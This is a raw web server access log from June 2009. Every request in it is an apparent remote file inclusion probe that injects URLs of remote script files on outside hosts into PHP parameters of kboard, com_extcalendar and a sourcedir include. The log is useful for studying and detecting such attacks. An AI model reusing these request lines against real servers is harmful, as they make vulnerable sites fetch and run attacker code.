222.162.115.67 - - [28/Jun/2009:07:53:28 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:53:45 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:07:54:31 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:07:54:31 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:07:54:31 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.16.83.24 - - [28/Jun/2009:07:54:32 -0400] "GET /?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
87.16.83.24 - - [28/Jun/2009:07:54:32 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
